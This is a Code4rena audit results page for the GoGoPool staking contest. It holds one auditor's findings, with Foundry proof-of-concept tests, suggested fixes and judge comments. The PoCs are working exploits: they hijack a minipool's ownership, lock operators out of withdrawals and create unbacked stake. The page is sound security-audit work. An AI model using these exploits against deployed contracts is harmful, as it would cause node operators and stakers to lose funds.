Platform: Code4rena
Start Date: 15/12/2022
Pot Size: $128,000 USDC
Total HM: 28
Participants: 111
Period: 19 days
Judge: GalloDaSballo
Total Solo HM: 1
Id: 194
League: ETH
Rank: 57/111
Findings: 4
Award: $123.59
π Selected for report: 0
π Solo Findings: 0
π Selected for report: 0xdeadbeef0x
Also found by: 0Kage, 0xc0ffEE, 0xmint, AkshaySrivastav, Allarious, Ch_301, Franfran, HollaDieWaldfee, IllIllI, Jeiwan, Lirios, Manboy, adriro, ak1, bin2chen, caventa, chaduke, clems4ever, cozzetti, datapunk, imare, immeas, kaliberpoziomka8552, ladboy233, pauliax, peritoflores, rvierdiiev, sces60107, sk8erboy, stealthyz, unforgiven, wagmi, wallstreetvilkas, yixxas
9.9345 USDC - $9.93
https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L259 https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L163 https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L289
A malicious staker can block withdrawals for a honest node operator by creating a new pool with the same nodeID
as the existing pool nodeID of honest node operator. Critical mistake here is that when a pool is in a valid transition state, createMinipool
function allows any random staker to overwrite the owner of an existing pool in Line 259 of MinipoolManager.sol.
Once a new owner is set to an existing nodeID, original minipool operator loses all access to his AVAX. This operator can no longer withdraw AVAX from the minipool (I've demonstrated this below in test case construction). I've classified it as HIGH
risk because it causes loss of funds to node operators.
The key parts of logic exploited here are
Withdrawable
is a valid preceeding state to Prelaunch
createMinipool
does not check if msg.sender == owner when a previous nodeID
is being usedHere is the code for exploit. Note that at the end of exploit, honest node operator gets a denial of service when calling withdrawMinipoolFunds
function testExploitMinipoolCreation() public { // step 0 - assume liquid staker deposits enough AVAX into the staking contract address liquidStaker = getActorWithTokens("liquidStaker1", 10000 ether, 0); vm.startPrank(liquidStaker); uint256 shares = ggAVAX.depositAVAX{value: 10000 ether}(); assertEq(shares, 10000 ether); vm.stopPrank(); // step 1 - node operator stakes 1000 GGP vm.startPrank(nodeOp); ggp.approve(address(staking), 1000 ether); staking.stakeGGP(1000 ether); assertEq(staking.getGGPStake(nodeOp), 1000 ether); // step 2 - node operator create minipool of 4000 AVAX MinipoolManager.Minipool memory mp1 = createMinipool(4000 ether, 4000 ether, 2 weeks); int256 minipoolIndx = minipoolMgr.getIndexOf(mp1.nodeID); assertEq(minipoolIndx, 0); assertEq(mp1.avaxLiquidStakerAmt, 4000 ether); assertEq(mp1.avaxNodeOpAmt, 4000 ether); vm.stopPrank(); // step 3 - rialto claims and initiates staking & records staking start vm.startPrank(address(rialto)); minipoolMgr.claimAndInitiateStaking(mp1.nodeID); bytes32 txID = keccak256("txid"); minipoolMgr.recordStakingStart(mp1.nodeID, txID, block.timestamp); // step 4 - skip 2 weeks to complete duration of pool skip(2 weeks); // step 5 - rialto records staking end // for simplicity, I assume rewards = 0 (slash) minipoolMgr.recordStakingEnd{value: 8000 ether}(mp1.nodeID, block.timestamp, 0); // At this stage, pool is in the `Withdrawable` state as seen by test below // Original pool owner can withdraw his 4000 ether by calling `withdrawMinipoolFunds` MinipoolManager.Minipool memory mp1Updated = minipoolMgr.getMinipool(minipoolIndx); assertEq(mp1Updated.status, uint256(MinipoolStatus.Withdrawable)); assertEq(mp1Updated.avaxNodeOpAmt, 4000 ether); assertEq(mp1Updated.owner, nodeOp); vm.stopPrank(); // step 6 - EXPLOIT // Assume an exploiter knows nodeID of current node operator // Stake GGP and create a minipool with same nodeId as the existing node operator // only this time, msg.sender = exploiter vm.startPrank(nodeOpExploiter); ggp.approve(address(staking), 200 ether); staking.stakeGGP(200 ether); assertEq(staking.getGGPStake(nodeOpExploiter), 200 ether); minipoolMgr.createMinipool{value: 1000 ether}(mp1.nodeID, 2 weeks, 0.02 ether, 1000 ether); MinipoolManager.Minipool memory mp1Exploited = minipoolMgr.getMinipool(minipoolMgr.getIndexOf(mp1.nodeID)); // THIS POOL IS NOW EXPLOITED.. // Node ID of this pool is same as nodeID of old pool assertEq(mp1Exploited.nodeID, mp1.nodeID); // Pool owner is successfully changed to exploiter assertEq(mp1Exploited.owner, nodeOpExploiter); // Pool was earlier in withdrawable state -> moved back into Prelaunch state assertEq(mp1Exploited.status, uint256(MinipoolStatus.Prelaunch)); // avaxNodeOpAmt is overwritten - earlier 4000 ether accounting entry is gone assertEq(mp1Exploited.avaxNodeOpAmt, 1000 ether); vm.stopPrank(); // STEP 7: Honest NodeOP can no longer withdraw his own AVAX // function reverts as he no longer owns minipool with NodeID vm.startPrank(nodeOp); vm.expectRevert(MinipoolManager.OnlyOwner.selector); minipoolMgr.withdrawMinipoolFunds(mp1.nodeID); vm.stopPrank(); }
When creating new pool with old id, code doesn't check if the msg.sender == current owner of the nodeID. Fairly simple fix is to add onlyOwner
check in code block starting from Line 242 (see below)
if (minipoolIndex != -1) { onlyOwner(minipoolIndex); requireValidStateTransition(minipoolIndex, MinipoolStatus.Prelaunch); resetMinipoolData(minipoolIndex); // Also reset initialStartTime as we are starting a whole new validation setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".initialStartTime")), 0); }
#0 - c4-judge
2023-01-10T17:00:54Z
GalloDaSballo marked the issue as duplicate of #617
#1 - c4-judge
2023-01-10T17:01:29Z
GalloDaSballo marked the issue as duplicate of #213
#2 - c4-judge
2023-02-03T12:33:01Z
GalloDaSballo changed the severity to 2 (Med Risk)
#3 - c4-judge
2023-02-03T19:26:10Z
GalloDaSballo changed the severity to 3 (High Risk)
#4 - c4-judge
2023-02-08T08:26:45Z
GalloDaSballo changed the severity to 2 (Med Risk)
#5 - c4-judge
2023-02-08T08:50:11Z
GalloDaSballo changed the severity to 3 (High Risk)
#6 - c4-judge
2023-02-08T20:28:30Z
GalloDaSballo marked the issue as satisfactory
#7 - c4-judge
2023-02-09T08:53:06Z
GalloDaSballo changed the severity to QA (Quality Assurance)
#8 - Simon-Busch
2023-02-09T12:54:09Z
Changed severity back from QA to H as requested by @GalloDaSballo
π Selected for report: 0xbepresent
Also found by: 0Kage, Atarpara, Ch_301, Manboy, cozzetti, datapunk, immeas, kaliberpoziomka8552, peritoflores, rvierdiiev, sces60107, unforgiven, wagmi, yixxas
57.1995 USDC - $57.20
https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L530 https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L290
Multisig can move a pool from error
state to finished
state after human review of error by calling finishFailedMinipoolByMultisig
function in Line 530 of MinipoolManager.sol. This function can be accidentally or maliciously misused by a multisig to permanently lock-out a node operator from withdrawing funds from minipool.
Key vulnerability is that requireValidStateTransition
function in Line 290 of MinipoolManager.sol recognises both withdrawable
and error
states as valid predecessor states to finished
state.
So if a nodeID
of pool in withdrawable
state gets accidentally passed to finishFailedMinipoolByMultisig
function, its status gets updated to finished
. Side effect of this is that a node operator can never withdraw funds anymore using withdrawMinipoolFunds
. What makes it risky is that this state change is irreversible and even multisig/guardian cannot reverse status of a pool from finished
to withdrawable
.
Since a multisig can handle multiple minipools as platform scales, possibility of a human error that can lead to irreversible loss of funds cannot be ruled out. Considering that the issue leads to a direct loss of funds for node operator, I've classified it as HIGH
risk.
I've replicated the scenario in test case below.
Scenario setup in the following test case is as follows:
withdrawable
statenodeID
of this pool in place of another pool that is in error
statefinished
since withdrawable
is a valid predecessor statefunction testFailedPoolTokenLockup() public { // step 0 - add enough liquid staker funds to create a pool address liquidStaker = getActorWithTokens("liquidStaker1", 10000 ether, 0); vm.startPrank(liquidStaker); uint256 shares = ggAVAX.depositAVAX{value: 10000 ether}(); assertEq(shares, 10000 ether); vm.stopPrank(); // step 1 - node operator stakes 1000 GGP vm.startPrank(nodeOp); ggp.approve(address(staking), 1000 ether); staking.stakeGGP(1000 ether); assertEq(staking.getGGPStake(nodeOp), 1000 ether); // step 2 - node operator create minipool of 4000 AVAX MinipoolManager.Minipool memory mp1 = createMinipool(4000 ether, 4000 ether, 2 weeks); int256 minipoolIndx = minipoolMgr.getIndexOf(mp1.nodeID); assertEq(minipoolIndx, 0); assertEq(mp1.avaxLiquidStakerAmt, 4000 ether); assertEq(mp1.avaxNodeOpAmt, 4000 ether); vm.stopPrank(); // step 3 - rialto claims and initiates staking & records staking start vm.startPrank(address(rialto)); minipoolMgr.claimAndInitiateStaking(mp1.nodeID); bytes32 txID = keccak256("txid"); minipoolMgr.recordStakingStart(mp1.nodeID, txID, block.timestamp); // step 4 - skip 2 weeks to complete duration of pool skip(2 weeks); // step 5 - rialto records staking end // for simplicity, I assume rewards = 0 (slash) minipoolMgr.recordStakingEnd{value: 8000 ether}(mp1.nodeID, block.timestamp, 0); // At this stage, pool is in the `Withdrawable` state as seen by test below // NodeOp can withdraw his 4000 ether by calling `withdrawMinipoolFunds` MinipoolManager.Minipool memory mp1Updated = minipoolMgr.getMinipool(minipoolIndx); assertEq(mp1Updated.status, uint256(MinipoolStatus.Withdrawable)); assertEq(mp1Updated.avaxNodeOpAmt, 4000 ether); // step 6 - Multisig accidentally (or maliciously) updates this pool to finished // since 1 multisig can manage multiple pools, possibility of human error exists in picking a wrong nodeId // in this case, I've assumed multisig sends nodeID of pool in `withdrawable` state // since pools with status `error` and `withdrawable` are valid preceeding states to `finished` status // below function gets executed minipoolMgr.finishFailedMinipoolByMultisig(mp1.nodeID); MinipoolManager.Minipool memory mp1AfterFail = minipoolMgr.getMinipool(minipoolIndx); assertEq(mp1AfterFail.status, uint256(MinipoolStatus.Finished)); // step 7 - NodeOp is locked out of withdrawal of his AVAX // since the status is already in finished state, code returns InvalidStateTransition error vm.startPrank(nodeOp); vm.expectRevert(MinipoolManager.InvalidStateTransition.selector); minipoolMgr.withdrawMinipoolFunds(mp1.nodeID); vm.stopPrank(); }
Since withdrawable
& error
states are valid predecessors for finished
state - when calling finishFailedMinipoolByMultisig
function, code should strictly check that the current state is Error
and revert if state is Withdrawable
.
Recommend following change:
function finishFailedMinipoolByMultisig(address nodeID) external { int256 minipoolIndex = onlyValidMultisig(nodeID); requireValidStateTransition(minipoolIndex, MinipoolStatus.Finished); if(getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status"))) == uint256(MinipoolStatus.Withdrawable)){ revert InvalidStateTransition(); } setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Finished)); emit MinipoolStatusChanged(nodeID, MinipoolStatus.Finished); }
#0 - emersoncloud
2023-01-15T12:45:31Z
For the purposes of this audit we're assuming that the Rialto Multisig will always do the correct operation and won't finish a minipool before it's withdrawn.
I do agree that finishing a minipool before a node operator has withdrawn would result in lost funds for that node operator and is something we intend on fixing. I think medium is more appropriate for this report.
#1 - 0xju1ie
2023-01-17T10:09:44Z
#2 - c4-judge
2023-01-26T18:56:21Z
GalloDaSballo marked the issue as duplicate of #723
#3 - c4-judge
2023-02-03T10:47:49Z
GalloDaSballo changed the severity to 2 (Med Risk)
#4 - c4-judge
2023-02-08T20:13:44Z
GalloDaSballo marked the issue as satisfactory
π Selected for report: imare
Also found by: 0Kage, 0xbepresent, AkshaySrivastav, Faith, HollaDieWaldfee, Jeiwan, Saintcode_, betweenETHlines, btk, dic0de, enckrish, gz627, imare, jadezti, kaliberpoziomka8552, nogo, simon135, sk8erboy
34.7487 USDC - $34.75
I presume disabling a multisig feature in Line 68 of MultisigManager
is a security feature to prevent compromised/inactive multisigs.
However, a disabled multisig can currently perform mission critical operations such as minipool initiation, canceling multipools, allocating rewards etc. This is a significant security risk, both to the node operator and liquid staker. Since exploiting this can only be an inside job, I'm classifying it as MEDIUM risk (medium only because of the mission criticality of operations controlled by a pool multisig)
Guardian appoints Bob as multisig - Bob is tasked to maintain 5 minipools. Bob eventually leaves the core team and his account becomes inactive & hence disabled. Bob's multisig, although disabled, can still record start/end of staking, recreate minipools for the 5 minipools he controls. There is no provision currently to transfer multisigs of individual pools to a currently active multisig.
If Bob turns a malicious actor, all minipools assigned to Bob and the associated liquid staked AVAX and node operator staked AVAX/ GGP rewards are at risk.
Dev team has selectively implemented access controls - while a disabled multisig cannot set GGP-AVAX price or distribute GGP rewards, he can still continue to manage minipools. This selective approach on multisig access is inconsistent and risky - at the very minimum, I recommend to define a function with onlyGuardian
access in MinipoolManager
that gets called every time a multisig is disabled.
This function should loop
over all pools & replace the disabled
multisig with a currently active one. Since the number of minipools is easily known by getMinipoolCount
& getMinipools
will give us a list of all pools, such a function should be trivial to implement.
On a risk/reward spectrum, investing efforts in building a function that completely removes access of disabled multisigs makes absolute sense.
#0 - c4-judge
2023-01-08T12:54:50Z
GalloDaSballo marked the issue as duplicate of #618
#1 - c4-judge
2023-02-01T19:57:26Z
GalloDaSballo marked the issue as duplicate of #702
#2 - GalloDaSballo
2023-02-02T11:57:12Z
See #618
#3 - c4-judge
2023-02-02T11:57:16Z
GalloDaSballo marked the issue as partial-50
π Selected for report: imare
Also found by: 0Kage, 0xbepresent, AkshaySrivastav, Faith, HollaDieWaldfee, Jeiwan, Saintcode_, betweenETHlines, btk, dic0de, enckrish, gz627, imare, jadezti, kaliberpoziomka8552, nogo, simon135, sk8erboy
34.7487 USDC - $34.75
https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L236 https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MultisigManager.sol#L80 https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/RewardsPool.sol#L188
When a node operator creates a new pool using createMinipool
, a multisig is allotted by calling requireNextActiveMultisig
function in Line 236 of MinipoolManager. This function defined in Line 80 of MultisigManager.sol always returns the first active multisig in the list of multisigs. As a result, there is a chance that all available pools are allotted to a single multi-sig.
Since each multisig has the authority to start/end staking for a pool, review errors and finalize pools etc, possibility of human error increases when such activities are concentrated into one account. Also, while distributing rewards, in Line 188 of RewardsPool.sol, it is interesting to note that the protocol is distributing rewards equally among all active multisigs. A similar distribution is missing when it comes to allotment of minipools - it is all the more important because protocol does not currently have a way to transfer control of a pool from multisig A to multisig B. Its set once during pool creation and never changes till the pool retires.
Multisigs are performing irreversible actions on minipools that can potentially lockout node operator's funds (I've already submitted 2 high risk findings related to human errors or malicious attempts by multisigs that can lead to loss of operator funds). requireNextActiveMultisig
in its current form concentrates a lot of power in 1 multisig which can be more effectively decentralized.
I've marked this as MEDIUM
risk because it has no immediate threat but can pose long term risk as platform scales.
requireNextActiveMultisig
always chooses Bob as the multisig responsible for every pool createderrors
while staking on P-chain. Bob also needs to start and stop pools and cancel pools where appropriateThere are multiple ways to mitigate this concentration risk - one recommendation is as follows:
keccak256(abi.encodePacked("multisig.item", index, ".poolCount"))
requireNextActiveMultisig
, loop through all multisigs (since they are limited, it won't be gas heavy) to find an active multisig with lowest poolCountThis way, the allotment workload will be evenly distributed across active multisigs.
#0 - 0xju1ie
2023-01-19T11:40:48Z
#1 - c4-judge
2023-01-31T19:21:58Z
GalloDaSballo marked the issue as duplicate of #702
#2 - GalloDaSballo
2023-02-02T11:51:06Z
Ignoring the reward / Admin Privilege aspect, only focusing on requireNextActiveMultisig
not functioning
#3 - c4-judge
2023-02-08T19:58:17Z
GalloDaSballo marked the issue as satisfactory
π Selected for report: hansfriese
Also found by: 0Kage, 0xdeadbeef0x, Allarious, Aymen0909, Ch_301, Franfran, HollaDieWaldfee, Jeiwan, Nyx, RaymondFam, SmartSek, adriro, betweenETHlines, bin2chen, cccz, datapunk, immeas, kaliberpoziomka8552, peritoflores, wagmi
21.713 USDC - $21.71
https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L451 https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L165
Node operators can restake their rewards into a pool using the recreateMinipool
function in Line 444 of MinipoolManager.sol. This feature can be exploited if a multisig either accidentally or maliciously sends nodeID
of a retired pool (one that has completed its duration and is in finished
state & where node operator has withdrawn all funds from that pool).
By doing this, this retired pool is pushed back into Prelaunch
phase and avaxStaked
becomes non-zero even without node-operator depositing any funds to the pool. This accounting entry (which is a liability for protocol) can be manipulated without actual deposits backing such a liability.
This vulnerability happens because
a. Minipool storage does note delete node operator's rewards in last cycle even when the pool is retired. This amount then gets assigned to avaxStaked
for recreated pool - a malicious node operator can simply wait for cancellation moratorium period to complete and then go and withdraw this avaxStaked
for free.
b. A Finished
state is a valid predecessor state for a Prelaunch
state as per valid state transition logic.
Since this exploit causes a direct loss of funds to protocol, I've marked the issue as HIGH
risk. Below is a test case to demonstrate this exploit
Here is a exploit scenario
Finished
statenodeID
of this finished pool to recreatePool
. Finished
state of pool is a valid predecessor state to Prelaunch
state & hence this function gets executedNodeOpRewards
of the previous pool & increaseAVAX
function on staking
increases AVAX stake. Note that this is only an accounting entry and no actual deposit was made by node operatorfunction testRecreatePoolWithZeroDeposit() public { // STEP 0 - liquid staker stakes enough eth for pool creation address liquidStaker = getActorWithTokens("liquidStaker1", 10000 ether, 0); vm.startPrank(liquidStaker); uint256 shares = ggAVAX.depositAVAX{value: 10000 ether}(); assertEq(shares, 10000 ether); vm.stopPrank(); // STEP 1 - node operator stakes 1000 GGP vm.startPrank(nodeOp); ggp.approve(address(staking), 1000 ether); staking.stakeGGP(1000 ether); assertEq(staking.getGGPStake(nodeOp), 1000 ether); // STEP 2 - node operator create minipool of 1000 AVAX MinipoolManager.Minipool memory mp1 = createMinipool(1000 ether, 1000 ether, 2 weeks); int256 minipoolIndx = minipoolMgr.getIndexOf(mp1.nodeID); assertEq(minipoolIndx, 0); assertEq(mp1.avaxLiquidStakerAmt, 1000 ether); assertEq(mp1.avaxNodeOpAmt, 1000 ether); vm.stopPrank(); // STEP 3 - rialto claims and initiates staking & records staking start vm.startPrank(address(rialto)); minipoolMgr.claimAndInitiateStaking(mp1.nodeID); bytes32 txID = keccak256("txid"); minipoolMgr.recordStakingStart(mp1.nodeID, txID, block.timestamp); // STEP 4 - skip 2 weeks to complete duration of pool skip(2 weeks); // STEP 5 - calculate rewards and deal rialto rewardds // in this case, I'm hardcoding 50 ether as rewards uint256 rewards = 50 ether; deal(address(rialto), address(rialto).balance + rewards); // STEP 6 - rialto records staking end // pay out the 50 ether rewards at this stage minipoolMgr.recordStakingEnd{value: 2000 ether + 50 ether}(mp1.nodeID, block.timestamp, 50 ether); vm.stopPrank(); // STEP 7 - node Op goes and withdraws all funds from pool vm.startPrank(nodeOp); minipoolMgr.withdrawMinipoolFunds(mp1.nodeID); // at this point, nodeOP has withdrawn all AVAX from the pool // status of pool is 'Finished // checking balance of AVAXStaked in pool int256 stakerIndex = staking.getIndexOf(nodeOp); assertGt(stakerIndex, -1); assertEq(store.getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndx, ".status"))), uint256(MinipoolStatus.Finished)); assertEq(store.getUint(keccak256(abi.encodePacked("staker.item", stakerIndex, ".avaxStaked"))), 0); assertEq(store.getUint(keccak256(abi.encodePacked("staker.item", stakerIndex, ".avaxAssigned"))), 0); // note that the reward amount at this stage is 28.75 ether assertEq(store.getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndx, ".avaxNodeOpRewardAmt"))), 28.75 ether); // 50/2 + 0.15*25 = 28.75 ether vm.stopPrank(); //STEP 8 - multisig accidentally (or maliciously) brings a dead minipool back alive //by passing it into recreate minipool function vm.startPrank(address(rialto)); minipoolMgr.recreateMinipool(mp1.nodeID); MinipoolManager.Minipool memory recreatedPool = minipoolMgr.getMinipoolByNodeID(mp1.nodeID); /// avaxNodeOpAmount and avaxLiquidStake Amount is 1000 ether // status of finished pool is set back to PreLaunch // EXPLOIT: notice also that staking entries for staker have reappeared // WITHOUT ADDING ANY FUNDS assertEq(recreatedPool.status, uint256(MinipoolStatus.Prelaunch)); assertEq(recreatedPool.avaxNodeOpAmt, 1028.75 ether); assertEq(store.getUint(keccak256(abi.encodePacked("staker.item", stakerIndex, ".avaxStaked"))), 28.75 ether); // Node operator can wait till cancellation moratorium // And withdraw these funds from pool - at zero cost vm.stopPrank(); }
recreatePool
assumes that the pool is in Withdrawable
state but this implicit assumption can be exploited as shown above.
When node operator calls withdrawMinipoolFunds
to withdraw all deposited AVAX, all the pool storage parameters specific to rewards should be reset to zero. Fortunately, we have a function just to do this - recommendation is to just call resetMinipoolData(minipoolIndex)
inside of withdrawMinipoolFunds
once pool is emptied by node operator. At this point, this pool is dead & there is no point in retaining data pertaining to past pool.
function withdrawMinipoolFunds(address nodeID) external nonReentrant { int256 minipoolIndex = requireValidMinipool(nodeID); address owner = onlyOwner(minipoolIndex); requireValidStateTransition(minipoolIndex, MinipoolStatus.Finished); setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Finished)); uint256 avaxNodeOpAmt = getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpAmt"))); uint256 avaxNodeOpRewardAmt = getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpRewardAmt"))); uint256 totalAvaxAmt = avaxNodeOpAmt + avaxNodeOpRewardAmt; Staking staking = Staking(getContractAddress("Staking")); staking.decreaseAVAXStake(owner, avaxNodeOpAmt); resetMinipoolData(minipoolIndex); // FIX - add this here Vault vault = Vault(getContractAddress("Vault")); vault.withdrawAVAX(totalAvaxAmt); owner.safeTransferETH(totalAvaxAmt); }
#0 - emersoncloud
2023-01-15T12:40:49Z
Thanks for the report! However this exploit depends on the Rialto Multisig acting incorrectly, and for the purposes of this audit we are assuming that Rialto will always do the correct operation.
There are several privileged actors in the protocol (Rialto TSS Multisig, and Guardian Multisig) and contract functions that are only callable by these privileged actors. If there is an exploit which can only be executed by these privileged actors we do not consider that to be in scope for this audit.
We do intend to make the state transitions more strict, and have recreateMinipool
explicitly check which state the minipool is currently in.
#1 - c4-judge
2023-02-03T12:42:48Z
GalloDaSballo marked the issue as duplicate of #569
#2 - GalloDaSballo
2023-02-03T12:42:52Z
Issue with FSM
#3 - c4-judge
2023-02-03T12:42:59Z
GalloDaSballo changed the severity to 2 (Med Risk)
#4 - c4-judge
2023-02-08T20:15:59Z
GalloDaSballo marked the issue as satisfactory
#5 - c4-judge
2023-02-09T08:45:54Z
GalloDaSballo changed the severity to QA (Quality Assurance)
#6 - Simon-Busch
2023-02-09T12:37:09Z
Changed the severity back to M as requested by @GalloDaSballo